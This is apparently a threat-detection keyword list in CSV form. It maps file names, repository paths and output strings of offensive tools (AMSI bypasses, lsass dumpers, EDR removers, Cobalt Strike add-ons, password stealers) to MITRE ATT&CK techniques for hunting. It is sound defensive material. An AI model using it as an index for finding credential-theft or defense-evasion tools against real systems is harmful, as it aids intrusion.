-*akeehkgglkmpapdnanoochpfmeghfdln*,greyware_tool_keyword,VPN Master,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A
-*akkbkhnikoeojlhiiomohpdnkhbkhieh*,greyware_tool_keyword,Prime VPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A
-*AlanFramework.git*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,1,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z
-*Alcatraz.sln*,offensive_tool_keyword,Alcatraz,x64 binary obfuscator,T1027 - T1140,TA0004 - TA0042,N/A,N/A,Defense Evasion,https://github.com/weak1337/Alcatraz,1,1,N/A,10,10,1345,219,2023-07-14T14:19:01Z,2022-12-21T17:27:56Z
-*Alcatraz.vcxproj*,offensive_tool_keyword,Alcatraz,x64 binary obfuscator,T1027 - T1140,TA0004 - TA0042,N/A,N/A,Defense Evasion,https://github.com/weak1337/Alcatraz,1,1,N/A,10,10,1345,219,2023-07-14T14:19:01Z,2022-12-21T17:27:56Z
-*Alcatraz/obfuscator*,offensive_tool_keyword,Alcatraz,x64 binary obfuscator,T1027 - T1140,TA0004 - TA0042,N/A,N/A,Defense Evasion,https://github.com/weak1337/Alcatraz,1,1,N/A,10,10,1345,219,2023-07-14T14:19:01Z,2022-12-21T17:27:56Z
-*Alcatraz-master.zip*,offensive_tool_keyword,Alcatraz,x64 binary obfuscator,T1027 - T1140,TA0004 - TA0042,N/A,N/A,Defense Evasion,https://github.com/weak1337/Alcatraz,1,1,N/A,10,10,1345,219,2023-07-14T14:19:01Z,2022-12-21T17:27:56Z
-*AlessandroZ/BeRoot*,offensive_tool_keyword,BeRoot,BeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege.,T1068 - T1548 - T1574,TA0003 - TA0008,N/A,N/A,Exploitation tools,https://github.com/AlessandroZ/BeRoot,1,1,N/A,N/A,10,2262,488,2022-02-08T10:30:38Z,2017-04-14T12:47:31Z
-*AlessandroZ/BeRoot*,offensive_tool_keyword,BeRoot,Privilege Escalation Project - Windows / Linux / Mac ,T1053.005 - T1069.002 - T1069.001 - T1053.003 - T1087.001 - T1087.002 - T1082 - T1135 - T1049 - T1007,TA0007 - TA0003 - TA0002 - TA0009 - TA0040 - TA0010,N/A,N/A,Privilege Escalation,https://github.com/AlessandroZ/BeRoot,1,1,N/A,N/A,10,2262,488,2022-02-08T10:30:38Z,2017-04-14T12:47:31Z
-*AlessandroZ/LaZagne*,offensive_tool_keyword,LaZagne,The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.,T1552 - T1003 - T1555,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/AlessandroZ/LaZagne,1,1,N/A,10,10,8527,1980,2023-08-12T12:38:22Z,2015-02-16T14:10:02Z
-*alexa-top-20000-sites.txt*,offensive_tool_keyword,lyncsmash,a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ,T1190 - T1087 - T1110,TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/nyxgeek/lyncsmash,1,1,N/A,N/A,4,323,68,2023-05-03T19:07:11Z,2016-05-20T04:32:41Z
-*al-khaser*,offensive_tool_keyword,al-khaser,al-khaser is a PoC malware application with good intentions that aims to stress your anti-malware system. It performs a bunch of common malware tricks with the goal of seeing if you stay under the radar,T1055 - T1117 - T1218 - T1003 - T1552,TA0002 - TA0008 - TA0006,N/A,N/A,Exploitation tools,https://github.com/LordNoteworthy/al-khaser,1,0,N/A,N/A,10,5073,1120,2023-09-29T17:54:38Z,2015-11-12T18:35:16Z
-*All EDR drivers were successfully removed from Kernel callbacks!*,offensive_tool_keyword,EDRSandblast-GodFault,Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.,T1547.002 - T1055.001 - T1205,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/gabriellandau/EDRSandblast-GodFault,1,0,N/A,10,2,180,34,2023-08-28T18:14:20Z,2023-06-01T19:32:09Z
-*All_SubdomainTOP_Seclist.txt*,offensive_tool_keyword,Sudomy,Sudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing automated reconnaissance (recon) for bug hunting / pentesting,T1595 - T1046,TA0002,N/A,N/A,Reconnaissance,https://github.com/screetsec/Sudomy,1,1,N/A,N/A,10,1718,352,2023-09-19T08:38:55Z,2019-07-26T10:26:34Z
-*AllowDelegationUsers.txt*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - 
T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*AllowDelegationUsers_samaccountnames_only.txt*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*almalgbpmcfpdaopimbdchdliminoign*,greyware_tool_keyword,Urban Shield,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*almandin/krbjack*,offensive_tool_keyword,krbjack,A Kerberos AP-REQ hijacking tool with DNS unsecure updates abuse.,T1558.002 - T1552.004 - T1048.005,TA0006 - TA0007 ,N/A,N/A,Sniffing & Spoofing,https://github.com/almandin/krbjack,1,1,N/A,10,1,73,13,2023-05-21T15:00:07Z,2023-04-16T10:44:55Z -*ALPC-TaskSched-LPE*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*ALPC-TaskSched-LPE.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*Alphabug_CS*,offensive_tool_keyword,cobaltstrike,CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. 
to solve the problem that cs4.x cannot run on Linux and report errors,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/AlphabugX/csOnvps,1,1,N/A,10,10,277,68,2022-03-19T00:10:03Z,2021-12-02T02:10:42Z -*Alphabug_CS*,offensive_tool_keyword,cobaltstrike,CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. 
to solve the problem that cs4.x cannot run on Linux and report errors Gray often ginkgo design,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/AlphabugX/csOnvps,1,1,N/A,10,10,277,68,2022-03-19T00:10:03Z,2021-12-02T02:10:42Z -*AlphabugX/csOnvps*,offensive_tool_keyword,cobaltstrike,CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. 
to solve the problem that cs4.x cannot run on Linux and report errors,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/AlphabugX/csOnvps,1,1,N/A,10,10,277,68,2022-03-19T00:10:03Z,2021-12-02T02:10:42Z -*AlphabugX/csOnvps*,offensive_tool_keyword,cobaltstrike,CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. 
to solve the problem that cs4.x cannot run on Linux and report errors Gray often ginkgo design,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/AlphabugX/csOnvps,1,1,N/A,10,10,277,68,2022-03-19T00:10:03Z,2021-12-02T02:10:42Z -*Already SYSTEM*not elevating*,offensive_tool_keyword,cobaltstrike,Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - 
T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/GhostPack/Koh,1,0,N/A,10,10,447,59,2022-07-13T23:41:38Z,2022-07-07T17:14:09Z -*AlteredSecurity/365-Stealer*,offensive_tool_keyword,365-Stealer,365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack,T1111 - T1566.001 - T1078.004,TA0004 - TA0001 - TA0040,N/A,N/A,Phishing,https://github.com/AlteredSecurity/365-Stealer,1,1,N/A,10,3,288,74,2023-06-15T19:56:12Z,2020-09-20T18:22:36Z -*alwaysinstallelevated.*,offensive_tool_keyword,silenttrinity,SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). 
The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.,T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018,TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/SILENTTRINITY,1,1,N/A,N/A,10,2070,413,2023-07-08T19:10:18Z,2018-09-25T15:17:30Z -*alwaysinstallelevated.c*,offensive_tool_keyword,PrivKit,PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.,T1548.002 - T1059.003 - T1027.002,TA0005,N/A,N/A,Privilege Escalation,https://github.com/mertdas/PrivKit,1,0,N/A,9,3,265,35,2023-03-23T09:50:09Z,2023-03-20T04:19:40Z -*alwaysinstallelevated.o*,offensive_tool_keyword,PrivKit,PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.,T1548.002 - T1059.003 - T1027.002,TA0005,N/A,N/A,Privilege Escalation,https://github.com/mertdas/PrivKit,1,0,N/A,9,3,265,35,2023-03-23T09:50:09Z,2023-03-20T04:19:40Z -*am0nsec/HellsGate*,offensive_tool_keyword,HellsGate,The Hell's Gate technique is a method employed by malware to hide its malicious behavior and avoid detection. 
This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs,T1055 - T1548.002 - T1129,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/am0nsec/HellsGate,1,1,N/A,N/A,8,723,117,2021-06-28T15:42:36Z,2020-06-02T17:10:21Z -*amass enum -d *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*amass-get-rootdomains*,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,1,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z -*amass-get-subdomains*,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,1,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z -*amnoibeflfphhplmckdbiajkjaoomgnj*,greyware_tool_keyword,HideAll VPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*AMS1-Patch.exe*,offensive_tool_keyword,AMSI_patch,Patching AmsiOpenSession by forcing an error branching,T1055 - T1055.001 - T1112,TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/AMSI_patch,1,1,N/A,8,2,126,27,2023-08-02T02:27:00Z,2023-02-03T18:11:37Z -*AMSI patched in all powershells*,offensive_tool_keyword,Amsi-Killer,Lifetime AMSI 
bypass,T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/ZeroMemoryEx/Amsi-Killer,1,0,N/A,10,5,493,77,2023-09-26T00:49:22Z,2023-02-26T19:05:14Z -*AMSI_Bypass.ps1*,offensive_tool_keyword,Ninja,Open source C2 server created for stealth red team operations,T1024 - T1071 - T1029 - T1569,TA0002 - TA0003 - TA0040,N/A,N/A,C2,https://github.com/ahmedkhlief/Ninja,1,1,N/A,10,10,720,166,2022-09-26T16:07:43Z,2020-03-04T14:17:22Z -*AMSI_bypass_20*.ps1,offensive_tool_keyword,PSSW100AVB,This is the PSSW100AVB (Powershell Scripts With 100% AV Bypass) Framework.A list of useful Powershell scripts with 100% AV bypass ratio,T1548 T1562 T1027 ,N/A,N/A,N/A,Defense Evasion,https://github.com/tihanyin/PSSW100AVB,1,1,N/A,N/A,10,983,166,2022-06-18T16:52:38Z,2021-10-08T17:36:24Z -*AMSI_patch-main*,offensive_tool_keyword,AMSI_patch,Patching AmsiOpenSession by forcing an error branching,T1055 - T1055.001 - T1112,TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/AMSI_patch,1,1,N/A,8,2,126,27,2023-08-02T02:27:00Z,2023-02-03T18:11:37Z -*Amsi-Bypass*,offensive_tool_keyword,Github Username,This repo contains some Antimalware Scan Interface (AMSI) bypass / avoidance methods i found on different Blog Posts.,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell,1,1,N/A,N/A,10,1325,245,2023-03-01T17:09:02Z,2019-05-14T06:09:25Z -*amsi-bypass*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,0,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*AmsiBypass.cs*,offensive_tool_keyword,CheeseTools,tools for Lateral Movement/Code Execution,T1021.006 - T1059.003 - T1105,TA0008 - TA0002,N/A,N/A,Lateral Movement - Sniffing & 
Spoofing,https://github.com/klezVirus/CheeseTools,1,1,N/A,10,7,653,138,2021-08-17T20:22:56Z,2020-08-24T01:28:12Z -*Amsi-Killer.exe*,offensive_tool_keyword,Amsi-Killer,Lifetime AMSI bypass,T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/ZeroMemoryEx/Amsi-Killer,1,1,N/A,10,5,493,77,2023-09-26T00:49:22Z,2023-02-26T19:05:14Z -*Amsi-Killer.sln*,offensive_tool_keyword,Amsi-Killer,Lifetime AMSI bypass,T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/ZeroMemoryEx/Amsi-Killer,1,1,N/A,10,5,493,77,2023-09-26T00:49:22Z,2023-02-26T19:05:14Z -*Amsi-Killer.vcxproj*,offensive_tool_keyword,Amsi-Killer,Lifetime AMSI bypass,T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/ZeroMemoryEx/Amsi-Killer,1,1,N/A,10,5,493,77,2023-09-26T00:49:22Z,2023-02-26T19:05:14Z -*Amsi-Killer-master*,offensive_tool_keyword,Amsi-Killer,Lifetime AMSI bypass,T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/ZeroMemoryEx/Amsi-Killer,1,1,N/A,10,5,493,77,2023-09-26T00:49:22Z,2023-02-26T19:05:14Z -*AmsiOpenSession.cpp*,offensive_tool_keyword,AMSI_patch,Patching AmsiOpenSession by forcing an error branching,T1055 - T1055.001 - T1112,TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/AMSI_patch,1,1,N/A,8,2,126,27,2023-08-02T02:27:00Z,2023-02-03T18:11:37Z -*AmsiOpenSession.sln*,offensive_tool_keyword,AMSI_patch,Patching AmsiOpenSession by forcing an error branching,T1055 - T1055.001 - T1112,TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/AMSI_patch,1,1,N/A,8,2,126,27,2023-08-02T02:27:00Z,2023-02-03T18:11:37Z -*AmsiOpenSession.vcxproj*,offensive_tool_keyword,AMSI_patch,Patching AmsiOpenSession by forcing an error branching,T1055 - T1055.001 - T1112,TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/AMSI_patch,1,1,N/A,8,2,126,27,2023-08-02T02:27:00Z,2023-02-03T18:11:37Z -*and Credential Guard will not be bypassed*,offensive_tool_keyword,EDRSandblast-GodFault,Integrates GodFault into EDR Sandblast achieving the same result without the use of 
any vulnerable drivers.,T1547.002 - T1055.001 - T1205,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/gabriellandau/EDRSandblast-GodFault,1,0,N/A,10,2,180,34,2023-08-28T18:14:20Z,2023-06-01T19:32:09Z -*andotp2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*AndrewSpecial.cpp*,offensive_tool_keyword,AndrewSpecial,AndrewSpecial - dumping lsass memory stealthily,T1003.001 - T1055.001,TA0006 - TA0004,N/A,N/A,Credential Access,https://github.com/hoangprod/AndrewSpecial,1,1,N/A,10,4,370,101,2019-06-02T02:49:28Z,2019-01-18T19:12:09Z -*AndrewSpecial.exe*,offensive_tool_keyword,AndrewSpecial,AndrewSpecial - dumping lsass memory stealthily,T1003.001 - T1055.001,TA0006 - TA0004,N/A,N/A,Credential Access,https://github.com/hoangprod/AndrewSpecial,1,1,N/A,10,4,370,101,2019-06-02T02:49:28Z,2019-01-18T19:12:09Z -*AndrewSpecial-master*,offensive_tool_keyword,AndrewSpecial,AndrewSpecial - dumping lsass memory stealthily,T1003.001 - T1055.001,TA0006 - TA0004,N/A,N/A,Credential Access,https://github.com/hoangprod/AndrewSpecial,1,1,N/A,10,4,370,101,2019-06-02T02:49:28Z,2019-01-18T19:12:09Z -*androidbackup2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*androidfde2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*AnErrupTion/LoGiC.NET*,offensive_tool_keyword,LoGiC.NET,A more advanced free and open .NET obfuscator using dnlib,T1001,TA0011,N/A,N/A,Defense 
Evasion,https://github.com/AnErrupTion/LoGiC.NET,1,1,N/A,N/A,5,483,75,2023-08-23T09:55:54Z,2019-12-27T09:48:50Z -*Anevicon*,offensive_tool_keyword,Anevicon,Attack simulation: Anevicon is a high-performance traffic generator. designed to be as convenient and reliable as it is possible. It sends numerous UDP-packets to a victim. thereby simulating an activity that can be produced by your end users or a group of hackers.,T1498 - T1497 - T1496,TA0001 - TA0002 - TA0009,N/A,N/A,Exploitation tools,https://github.com/rozgo/anevicon,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*ANGRYPUPPY2.cna*,offensive_tool_keyword,cobaltstrike,Bloodhound Attack Path Automation in CobaltStrike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/vysecurity/ANGRYPUPPY,1,1,N/A,10,10,300,93,2020-04-26T17:35:31Z,2017-07-11T14:18:07Z -*anonsurf.py*,offensive_tool_keyword,hackingtool,ALL IN ONE Hacking Tool For Hackers,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/Z4nzu/hackingtool,1,1,N/A,N/A,10,39264,4347,2023-09-13T19:08:33Z,2020-04-11T09:21:31Z 
